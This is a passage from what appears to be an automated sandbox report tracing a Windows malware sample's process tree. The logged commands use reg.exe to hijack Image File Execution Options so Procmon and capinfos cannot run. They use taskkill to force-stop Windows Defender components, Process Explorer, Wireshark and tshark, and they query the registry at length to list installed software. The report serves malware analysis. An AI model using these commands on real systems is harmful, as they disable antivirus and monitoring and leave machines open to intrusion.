  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1952
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1048
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2040
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1964
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1064
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1848
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:904
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1784
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1812
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1336
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:268
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1464
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:1220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1564
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:388
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:1872
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:744
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:1620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1768
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:1336
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    PID:1812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1636
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:1112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:2028
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:1372
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    PID:1544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:388
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:1472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1816
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:1780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:1848
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:1772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:1548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:744
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:64
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:32
    3⤵
    PID:1052
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:884
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:556
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1700
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1924
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:872
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:668
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1324
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1840
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1916
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:816
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1920
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1232
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:744
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1708
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:2000
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:268
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:748
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1816
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:2040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:388
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:340
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:1060
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:1684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:1796
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:1040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1036
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:1232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:1068
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1072
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:1460
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:1336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:1852
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:108
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:872
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1324
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1228
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:340
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:1276
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:1360
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:1068
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1620
- - C:\Windows\system32\reg.exe
